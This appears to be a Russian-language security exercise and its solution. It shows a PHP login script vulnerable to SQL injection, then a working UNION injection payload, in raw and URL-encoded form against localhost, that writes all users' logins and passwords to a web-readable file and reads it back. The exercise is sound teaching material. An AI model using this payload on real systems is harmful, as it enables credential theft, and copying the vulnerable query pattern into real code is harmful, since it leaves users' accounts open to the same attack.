
```
#!php

Есть скрипт:
…
$login = $_REQUEST['login']; 
$password = $_REQUEST['password']; 
$res = mysql_query('SELECT id FROM users 
WHERE login="'.$login.'" AND password="'.$password.'"'); 
list($user_id) = mysql_fetch_array($res); 
session_start(); 
$_SESSION['authorized'] = isset($user_id);
…
Есть ли тут проблемы с безопасностью

Решение:

login =" , объединяем с данными таблицы и сохраняем в файл,
добавляем комментарий, чтобы экранировать остальную часть запроса.
SELECT id FROM users WHERE login="" UNION ALL SELECT group_concat(concat( login,'(',password,')') separator '; ')
from (select login, password FROM users)n INTO OUTFILE 'D:\\USR\\www\\1.txt' -- s" AND password=""

http://localhost/task_7.2/index.php?login=%22%20UNION%20ALL%20SELECT%20group_concat%28concat%28%20login,%27%28%27,password,%27%29%27%29%20separator%20%27;%20%27%29%20from%20%28select%20login,%20password%20FROM%20users%29n%20INTO%20OUTFILE%20%27D:\\USR\\www\\1.txt%27%20--%20s

Читаем файл:

http://localhost/1.txt
```